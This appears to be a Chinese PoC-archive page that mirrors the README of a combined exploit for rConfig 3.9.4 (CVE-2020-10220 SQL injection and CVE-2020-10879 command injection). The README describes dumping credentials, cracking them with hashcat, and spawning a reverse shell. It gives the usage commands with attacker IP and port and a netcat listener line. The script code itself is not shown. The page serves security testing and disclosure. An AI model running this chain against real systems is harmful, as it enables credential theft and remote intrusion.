POC详情: b3e399f2d37077c12dbc2f2b440e0a1690e1c7a0

来源
https://github.com/CSpanias/rConfig_rce
关联漏洞
标题: rConfig SQL注入漏洞 (CVE-2020-10220)
描述:rConfig是一款开源的网络配置管理实用程序。 rConfig 3.9.4及之前版本中存在SQL注入漏洞。该漏洞源于基于数据库的应用缺少对外部输入SQL语句的验证。攻击者可利用该漏洞执行非法SQL命令。
描述
Combined PoCs for rConfig: SQL Injection (CVE-2020-10220) & Command Injection (CVE-2020-10879)
介绍
# rConfig 3.9 Combined SQL Injection and Command Injection PoC

## Overview
This PoC targets rConfig version `3.9.4` and demonstrates exploitation through a combination of SQL Injection and Remote Command Injection vulnerabilities. It automates the process of:
1. Extracting database name via SQLi
2. Dumping user credentials from the database
3. Attempting to crack password hashes using hashcat with the `rockyou` wordlist and `best64.rules`
4. Optionally performing Remote Command Execution (RCE) via command injection on the search functionality, using the cracked admin credentials

This script is based on and combines two original PoCs:
- [48208.py](https://www.exploit-db.com/exploits/48208) (SQL Injection) by vikingfr
- [48241.py](https://www.exploit-db.com/exploits/48241) (Command Injection) by Matthew Aberegg and Michael Burkey

It was modified in order to automate cracking and optional shell spawning.

## Requirements
- Python 3
- `requests` library (pip install requests)
- `hashcat` installed and accessible via command line
- `rockyou.txt` wordlist (or equivalent) located at `/usr/share/wordlists/rockyou.txt`
- hashcat rules file `/usr/share/hashcat/rules/best64.rule`

## Usage
To dump users and hashes only:
```bash
python3 rConfig_rce.py https://target
```
To dump users, crack passwords, and attempt RCE (requires attacker IP and port for reverse shell):
```bash
python3 rConfig_rce.py https://target attacker_ip attacker_port
```

## Notes
- If hashcat fails to crack the password, the script suggests using online cracking services such as [CrackStation](https://crackstation.net/).
- If the password hash cannot be cracked automatically, you will be prompted to input the plaintext password manually for RCE attempts.
- The script prioritizes using the `admin` account for the command injection phase.
- Make sure to have a listener (e.g., `nc -lvnp 80`) running on your attacker machine to catch the reverse shell.

## Disclaimer
This tool is intended for authorized security testing and educational purposes only. Unauthorized use against systems without permission is illegal and unethical.
文件快照

 [4.0K]  /data/pocs/b3e399f2d37077c12dbc2f2b440e0a1690e1c7a0
├── [7.8K]  rConfig_rce.py
└── [2.1K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。